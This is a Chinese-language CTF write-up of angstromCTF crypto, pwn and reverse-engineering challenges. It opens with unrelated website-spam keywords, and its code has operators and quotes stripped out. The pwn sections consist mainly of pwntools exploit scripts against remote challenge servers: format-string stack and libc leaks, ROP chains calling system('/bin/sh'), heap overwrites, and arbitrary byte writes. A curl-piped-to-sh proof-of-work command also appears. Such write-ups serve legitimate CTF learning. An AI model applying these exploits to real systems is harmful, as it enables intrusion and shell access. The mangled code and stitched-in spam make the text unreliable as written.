深圳做网站外包公司有哪些,邢台123生活网,凡科建设的网站如何,如何制作app课件教程这个比赛打了个开头就放弃了#xff0c;最近放弃的比较多#xff0c;国外的网太慢#xff0c;国内的题太难。
Crypto
ranch
这题直接给出密文这提示 rtkw{cf0bj_czbv_nvcc_y4mv_kf_kip_re0kyvi_uivjj1ex_5vw89s3r44901831} Caesar dressing is so 44 BC... 然后是加密程序…这个比赛打了个开头就放弃了最近放弃的比较多国外的网太慢国内的题太难。
Crypto
ranch
这题直接给出密文这提示 rtkw{cf0bj_czbv_nvcc_y4mv_kf_kip_re0kyvi_uivjj1ex_5vw89s3r44901831} Caesar dressing is so 44 BC... 然后是加密程序未知偏移
import stringf open(flag.txt).read()encrypted shift int(open(secret_shift.txt).read().strip())for i in f:if i in string.ascii_lowercase:encrypted chr(((ord(i) - 97 shift) % 26)97)else:encrypted iprint(encrypted) bugku上caser可以枚举 actf{lo0ks_like_well_h4ve_to_try_an0ther_dress1ng_5ef89b3a44901831} impossible
这题啊这个代码没看大明白这两个函数出来是全是1然后交集还是1然后是最下边的判断感觉是通不通可前边有个提示 Supply positive x and y such that x y and x y. 只要满足这个就行问了网友python还真有这个问题python的数字是变长的当一个是整形一个是对象的时候比较类型强制变换时就有这个问题。
#!/usr/local/bin/pythondef fake_psi(a, b):return [i for i in a if i in b]def zero_encoding(x, n):ret []for i in range(n):if (x 1) 0:ret.append(x | 1)x 1return retdef one_encoding(x, n):ret []for i in range(n):if x 1:ret.append(x)x 1return retprint(Supply positive x and y such that x y and x y.)
x int(input(x: ))
y int(input(y: ))if len(fake_psi(one_encoding(x, 64), zero_encoding(y, 64))) 0 and x y and x 0 and y 0:print(open(flag.txt).read())然后按他说的办就OK了高手还知道这个
┌──(kali㉿kali)-[~/ctf/0422]
└─$ nc challs.actf.co 32200
Supply positive x and y such that x y and x y.
x: 11111111111111111111111111111111111111111111111111111111111
y: 1
actf{se3ms_pretty_p0ssible_t0_m3_7623fb7e33577b8a} Lazy Lagrange
先看原题
N len(FLAG)
assert N 18, I\m too lazy to store a flag that long.
p None
a None
M (1 127) - 1def query1(s):if len(s) 100:return I\m too lazy to read a query that long.x s.split()if len(x) 10:return I\m too lazy to process that many inputs.if any(not x_i.isdecimal() for x_i in x):return I\m too lazy to decipher strange inputs.x (int(x_i) for x_i in x)global p, ap random.sample(range(N), kN)a [ord(FLAG[p[i]]) for i in range(N)]res for x_i in x:res f{sum(a[j] * x_i ** j for j in range(N)) % M}\nreturn resquery1(0)def query2(s):if len(s) 100:return I\m too lazy to read a query that long.x s.split()if any(not x_i.isdecimal() for x_i in x):return I\m too lazy to decipher strange inputs.x [int(x_i) for x_i in x]while len(x) N:x.append(0)z 1for i in range(N):z * not x[i] - a[i]return .join(str(p_i * z) for p_i in p)while True:try:choice int(input(: ))assert 1 choice 2match choice:case 1:print(query1(input(\t )))case 2:print(query2(input(\t )))except Exception as e:print(Bad input, exiting, e)break题目分两部分第一部分要求输入一个序列x然后会把flag打乱后逐位与x^j 相乘然后加到一起返回。
这步由于有长度限制把返回当成128进制7位输入128然后返7位ASCII码解开就恢复了
第二步要求输入序列与原打乱的flag相同就会返回打乱的序号。第1步恢复以后第二步得到顺序就OK了
from pwn import *p remote(challs.actf.co, 32100)
context.log_level debugp.sendlineafter(b: , b1)
p.sendlineafter(b , b128)
a int(p.recvline())
a bin(a)[2:].rjust(126,0)
b [int(a[i:i7],2) for i in range(0, 126,7)]
b bytes(b)[::-1]
p.sendlineafter(b: , b2)
p.sendlineafter(b , ( .join([str(i) for i in b]) ).encode())
odr [int(i) for i in p.recvline().decode().strip().split()]
a [0]*18
for i in range(18):a[odr[i]]b[i]print(bytes(a))
Royal Society of Arts
这是个RSA的题给了(p-1)(q-2)和(p-2)(q-1)这个简单了可以自己推也可以直接写式子让程序算
自己算也简单这两个一减就有pq了然后直接求就行
from Crypto.Util.number import getStrongPrime, bytes_to_long
f open(flag.txt).read()
m bytes_to_long(f.encode())
p getStrongPrime(512)
q getStrongPrime(512)
n p*q
e 65537
c pow(m,e,n)
print(n ,n)
print(e ,e)
print(c ,c)
print((p-2)*(q-1) , (p-2)*(q-1))
print((p-1)*(q-2) , (p-1)*(q-2))无难度
n 125152237161980107859596658891851084232065907177682165993300073587653109353529564397637482758441209445085460664497151026134819384539887509146955251284230158509195522123739130077725744091649212709410268449632822394998403777113982287135909401792915941770405800840172214125677106752311001755849804716850482011237
e 65537
c 40544832072726879770661606103417010618988078158535064967318135325645800905492733782556836821807067038917156891878646364780739241157067824416245546374568847937204678288252116089080688173934638564031950544806463980467254757125934359394683198190255474629179266277601987023393543376811412693043039558487983367289
#(p-2)*(q-1)
h1 125152237161980107859596658891851084232065907177682165993300073587653109353529564397637482758441209445085460664497151026134819384539887509146955251284230125943565148141498300205893475242956903188936949934637477735897301870046234768439825644866543391610507164360506843171701976641285249754264159339017466738250
#(p-1)*(q-2)
h2 125152237161980107859596658891851084232065907177682165993300073587653109353529564397637482758441209445085460664497151026134819384539887509146955251284230123577760657520479879758538312798938234126141096433998438004751495264208294710150161381066757910797946636886901614307738041629014360829994204066455759806614#p-q
h3 h1-h2
p,q var(p q)
solve([p*q n, p-q h3],[p,q])p 12432413118408092556922180864578909882548688341838757808040464238372914542545091804094841981170595006563808958609560634333378522509950041851974318809712087
q 10066608627787074136474825702134891213485892488338118768309318431767076602486802139831042195689782446036335353380696670398366251621025771896701757102780451
d inverse_mod(e, (p-1)*(q-1))
m pow(c,d,n)
long_to_bytes(int(m))
#actf{tw0_equ4ti0ns_in_tw0_unkn0wns_d62507431b7e7087}
Royal Society of Arts 2
国外好像对RSA不大关心所以经常出简单题这个给了密文然后让随便输入然后给出解密显然这里直接c*2^e就行提到的明文//2
from Crypto.Util.number import getStrongPrime, bytes_to_long, long_to_bytes
f open(flag.txt).read()
m bytes_to_long(f.encode())
p getStrongPrime(512)
q getStrongPrime(512)
n p*q
e 65537
c pow(m,e,n)
print(n ,n)
print(e ,e)
print(c ,c)d pow(e, -1, (p-1)*(q-1))c int(input(Text to decrypt: ))if c m or bactf{ in long_to_bytes(pow(c, d, n)):print(No flag for you!)exit(1)print(m , pow(c, d, n))
from pwn import *p remote(challs.actf.co, 32400)context.log_level debugn int(p.recvline()[4:])
e int(p.recvline()[4:])
c int(p.recvline()[4:])p.sendlineafter(bText to decrypt: , str(pow(2,e,n)*c%n).encode())
m int(p.recvline()[4:])
print(bytes.fromhex(hex(m1)[2:]))#actf{rs4_is_sorta_homom0rphic_50c8d344df58322b}
后边的就突然变难了不会了
pwn
queue
题目先把flag读到栈里然后有格式化字符串漏洞可以直接打印只是没有地址用不了找针按ll打出来再自己组合。
int __cdecl main(int argc, const char **argv, const char **envp)
{__gid_t rgid; // [rsp4h] [rbp-CCh]FILE *stream; // [rsp8h] [rbp-C8h]char format[48]; // [rsp10h] [rbp-C0h] BYREFchar s[136]; // [rsp40h] [rbp-90h] BYREFunsigned __int64 v9; // [rspC8h] [rbp-8h]v9 __readfsqword(0x28u);setbuf(_bss_start, 0LL);rgid getegid();setresgid(rgid, rgid, rgid);stream fopen(flag.txt, r);if ( !stream ){puts(Error: missing flag.txt.);exit(1);}fgets(s, 128, stream);printf(What did you learn in class today? );fgets(format, 48, stdin);printf(Oh nice, );printf(format);printf(sounds pretty cool!);return v9 - __readfsqword(0x28u);
} ┌──(kali㉿kali)-[~/ctf/0422] └─$ nc challs.actf.co 31322 What did you learn in class today? %14$p%15$p%16$p%17$p%18$p%19$p Oh nice, 0x3474737b667463610x75715f74695f6b630x615f74695f6575650x34373964613931360x7d32326234363863(nil) sounds pretty cool! %14$p%15$p%16$p%17$p%18$p%19$p a [0x3474737b66746361,0x75715f74695f6b63,0x615f74695f657565,0x3437396461393136,0x7d32326234363863] b.join([p64(i) for i in a]) bactf{st4ck_it_queue_it_a619ad974c864b22} gaga
这题给了3个远端还以为都一样原来每个只有一部分。
第1个给了地址和后门直接溢出
int __cdecl main(int argc, const char **argv, const char **envp)
{char v4[60]; // [rsp0h] [rbp-40h] BYREF__gid_t rgid; // [rsp3Ch] [rbp-4h]setbuf(_bss_start, 0LL);rgid getegid();setresgid(rgid, rgid, rgid);puts(Welcome to gaga!);puts(This challenge is meant to guide you through an introduction to binary exploitation.);printf(\nRight now, you are on stage0. Your goal is to redirect program control to win0, which is at address %p.\n,win0);printf(Your input: );return gets(v4);
}
第2个的后门带了两个参数
void __fastcall win1(int a1, int a2)
{char s[136]; // [rsp10h] [rbp-90h] BYREFFILE *stream; // [rsp98h] [rbp-8h]if ( a1 4919 || a2 16705 ){stream fopen(flag.txt, r);if ( !stream ){puts(Error: missing flag.txt.);exit(1);}fgets(s, 128, stream);puts(s);}
}
第3个就直接溢出没有后门了其实可以直接写第3个的程序一次跑3个地址有点区别
from pwn import *p remote(challs.actf.co, 31302)
#p process(./gaga2)
context(archamd64,log_level debug)#gdb.attach(p, b*0x401248)elf ELF(./gaga2)
pop_rdi 0x00000000004012b3 # pop rdi ; ret
pop_rsi 0x00000000004012b1 # pop rsi ; pop r15 ; ret
p.sendlineafter(bYour input: , bA*0x40 flat(0x404800, pop_rdi, elf.got[setbuf], elf.plt[puts], elf.sym[main]))
#p.sendlineafter(bYour input: , bA*0x40 flat(pop_rdi1,pop_rdi1, pop_rdi, 4919, pop_rsi, 16705,0, elf.sym[win1]))#p.recvline()
libc_addr u64(p.recv(6).ljust(8, b\x00)) - 0x8bad0
bin_sh libc_addr 0x1b45bd
system libc_addr 0x52290p.sendlineafter(bYour input: , bA*0x40 flat(0x404800, pop_rdi1, pop_rdi, bin_sh, system, elf.sym[main]))p.interactive()#actf{b4bys_
#actf{b4bys_f1rst_pwn!_
#actf{b4bys_f1rst_pwn!_3857ffd6bfdf775e}
leek
输入的堆块在密码前写溢出覆盖即可
int __cdecl main(int argc, const char **argv, const char **envp)
{unsigned int v3; // eaxint i; // [rsp0h] [rbp-50h]int j; // [rsp4h] [rbp-4Ch]__gid_t rgid; // [rsp8h] [rbp-48h]char *v9; // [rsp10h] [rbp-40h]void *s; // [rsp18h] [rbp-38h]char s2[40]; // [rsp20h] [rbp-30h] BYREFunsigned __int64 v12; // [rsp48h] [rbp-8h]v12 __readfsqword(0x28u);v3 time(0LL);srand(v3);setbuf(stdout, 0LL);setbuf(stdin, 0LL);rgid getegid();setresgid(rgid, rgid, rgid);puts(I dare you to leek my secret.);for ( i 0; i N; i ){v9 (char *)malloc(0x10uLL);s malloc(0x20uLL);memset(s, 0, 0x20uLL);getrandom(s, 32LL, 0LL);for ( j 0; j 31; j ){if ( !*((_BYTE *)s j) || *((_BYTE *)s j) 10 )*((_BYTE *)s j) 1;}printf(Your input (NO STACK BUFFER OVERFLOWS!!): );input(v9); // 最长1280printf(:skull::skull::skull: bro really said: );puts(v9);printf(So? Whats my secret? );fgets(s2, 33, stdin);if ( strncmp((const char *)s, s2, 0x20uLL) ){puts(Wrong!);exit(-1);}puts(Okay, Ill give you a reward for guessing it.);printf(Say what you want: );gets(v9);puts(Hmm... I changed my mind.);free(s);free(v9);puts(Next round!);}puts(Looks like you made it through.);win();return v12 - __readfsqword(0x28u);
}
不地要执行100次外国网站有点慢只能把串都根据长度连一起发不然就超时了sla很费时。
from pwn import *p remote(challs.actf.co, 31310)for i in range(0x64):p.sendline(bA*(0x40-1))p.sendline(bA*(0x20-1))p.sendline(bA*0x18 p64(0x31))print(i)context(archamd64,log_level debug)p.recvline()
p.interactive()widget
格式化字符串漏洞同时有溢出
int __cdecl main(int argc, const char **argv, const char **envp)
{int v4; // [rspCh] [rbp-24h] BYREFchar buf[24]; // [rsp10h] [rbp-20h] BYREF__gid_t rgid; // [rsp28h] [rbp-8h]unsigned int i; // [rsp2Ch] [rbp-4h]setbuf(_bss_start, 0LL);setbuf(stdin, 0LL);rgid getegid();setresgid(rgid, rgid, rgid);if ( called )exit(1);called 1;printf(Amount: );v4 0;__isoc99_scanf(%d, v4);getchar();if ( v4 0 ) //没限制多大exit(1);printf(Contents: );read(0, buf, v4);for ( i 0; (int)i v4; i ){if ( buf[i] 110 ){printf(bad %d\n, i);exit(1);}}printf(Your input: );return printf(buf);
}
用了一个我第一次见的工作量proof redpwnpow
from pwn import *def proof():p.recvuntil(bproof of work: curl -sSfL https://pwn.red/pow | sh -s )work p.recvline().decode().strip()r process([./redpwnpow-linux-amd64, work])p.sendafter(bsolution: , r.recvline())r.close()#p process(./widget)
p remote(challs.actf.co, 31320)context(archamd64, log_leveldebug)
elf ELF(./widget)
libc ELF(/home/kali/glibc/libs/2.35-0ubuntu3-amd64/libc.so.6)proof()
#gdb.attach(p, b*0x4014c5)p.sendlineafter(bAmount: , b256)
p.sendlineafter(bContents: , b%33$p,%34$p,.ljust(0x20, b\x00)flat(0x404800, 0x4013d9))
p.recvuntil(bYour input: )
libc.address int(p.recvuntil(b,, dropTrue),16) - 128 - libc.sym[__libc_start_main] #0x29d90
stack_addr int(p.recvuntil(b,, dropTrue),16) - 0x128print(libc:,hex(libc.address), stack,rbp:, hex(stack_addr))pop_rdi next(libc.search(asm(pop rdi;ret)))
bin_sh next(libc.search(b/bin/sh\0))p.sendlineafter(bAmount: , b256)
p.sendlineafter(bContents: , b\x00*0x28 flat(pop_rdi1, pop_rdi, bin_sh, libc.sym[system] ))p.interactive()
#actf{y0u_f0und_a_usefu1_widg3t!_30db5c45a07ac981}slack
又一个格式化字符串漏洞只是可输入非常短不足以干大活只能一个字节一个字节的写,由于有次数限制需要先改下
int __cdecl main(int argc, const char **argv, const char **envp)
{unsigned int v3; // eaxint v4; // eaxint i; // [rsp8h] [rbp-68h]__gid_t rgid; // [rspCh] [rbp-64h]time_t timer; // [rsp10h] [rbp-60h] BYREFstruct tm *tp; // [rsp18h] [rbp-58h]char s[32]; // [rsp20h] [rbp-50h] BYREFchar format[40]; // [rsp40h] [rbp-30h] BYREFunsigned __int64 v13; // [rsp68h] [rbp-8h]v13 __readfsqword(0x28u);setbuf(_bss_start, 0LL);setbuf(stdin, 0LL);rgid getegid();setresgid(rgid, rgid, rgid);puts(Welcome to slack (not to be confused with the popular chat service Slack)!);timer time(0LL);tp localtime(timer);v3 time(0LL);srand(v3);for ( i 0; i 2; i ) //需要先改小{strftime(s, 0x1AuLL, %Y-%m-%d %H:%M:%S, tp);v4 rand();printf(%s -- slack Bot: %s\n, s, (messages)[v4 % 8]);printf(Your message (to increase character limit, pay $99 to upgrade to Professional): );fgets(format, 14, stdin); // 13字节太小tp localtime(timer);strftime(s, 0x1AuLL, %Y-%m-%d %H:%M:%S, tp);printf(%s -- You: , s);printf(format);putchar(10);}return v13 - __readfsqword(0x28u);
}
先泄露libc,stack然后利用指向argv的栈地址链指向计数器高字节改为负数修改后再指向返回地址写payload
from pwn import *#p process(./slack)
p remote(challs.actf.co, 31500)context(archamd64, log_level debug)
libc ELF(/home/kali/glibc/libs/2.35-0ubuntu3-amd64/libc.so.6)def snd(pay):#p.sendafter(bProfessional): , pay.encode())p.send(pay.encode())#leak stack,libc
snd(%25$p,%41$p,\n)
p.recvuntil(bYou: )
i_addr int(p.recvuntil(b,, dropTrue), 16) - 0x180
libc.address int(p.recvuntil(b,, dropTrue), 16) - 128 - libc.sym[__libc_start_main]
print(hex(i_addr), hex(libc.address))#28-55-155 28-55-i
snd(f%{(i_addr0xffff)3}c%25$hn\n)
#set i -...
snd(f%255c%55$hhn\n)ret_addr i_addr 0x70
if i_addr0xff00 ret_addr 0xff00:snd(f%{ret_addr0xff}c%25$hhn\n)
else:snd(f%{ret_addr0xffff}c%25$hn\n)pop_rdi next(libc.search(asm(pop rdi;ret)))
bin_sh next(libc.search(b/bin/sh\x00))
payload flat(pop_rdi1, pop_rdi, bin_sh, libc.sym[system])
for i in range(len(payload)):v1 (ret_addri)0xffif v10:snd(f%25$hhn\n)else:snd(f%{v1}c%25$hhn\n)v2 payload[i]if v20:snd(f%55$hhn\n)else:snd(f%{v2}c%55$hhn\n)#25-55-i_addr3 set i0
if i_addr0xff00 ret_addr 0xff00:snd(f%{(i_addr3)0xff}c%25$hhn\n)
else:snd(f%{(i_addr3)0xffff}c%25$hn\n)snd(f%55$hhn\n)p.sendline(bcat flag.txt)
p.interactive()
#actf{succesfu1_onb0arding_f99454d9a2f42632}后边两个难的也没作国外网站太慢慢着慢着就放弃了。
RE
checker 略
zaza
一个异或运算
int __cdecl main(int argc, const char **argv, const char **envp)
{int v5; // [rsp8h] [rbp-58h] BYREFunsigned int v6; // [rspCh] [rbp-54h] BYREFchar s[72]; // [rsp10h] [rbp-50h] BYREFunsigned __int64 v8; // [rsp58h] [rbp-8h]v8 __readfsqword(0x28u);setbuf(_bss_start, 0LL);v5 0;v6 0;printf(Im going to sleep. Count me some sheep: );__isoc99_scanf(%d, v5);if ( v5 ! 4919 ) // 4919{puts(Thats not enough sheep!);exit(1);}printf(Nice, now reset it. Bet you cant: );__isoc99_scanf(%d, v6); // 1011094151if ( v5 * v6 1 ){printf(%d %d, v6, v6 v5);puts(Not good enough for me.);exit(1);}puts(Okay, whats the magic word?);getchar();fgets(s, 64, stdin);s[strcspn(s, \n)] 0;xor_(s);if ( strncmp(s, 2 $!-( **( ?!$$6,. ) $19 , #9!1 *6 6;66#, 0x32uLL) ){puts(Nope);exit(1);}win();return v8 - __readfsqword(0x28u);
} ┌──(kali㉿kali)-[~/ctf/0422] └─$ nc challs.actf.co 32760 Im going to sleep. Count me some sheep: 4919 Nice, now reset it. Bet you cant: 0 Okay, whats the magic word? SHEEPSHEEPSHEEPSHEEPSHEEPSHEEPSHEEPSHEEPSHEEPSHEEP actf{g00dnight_c7822fb3af92b949} 时间有点长都快忘了。赶紧补上。
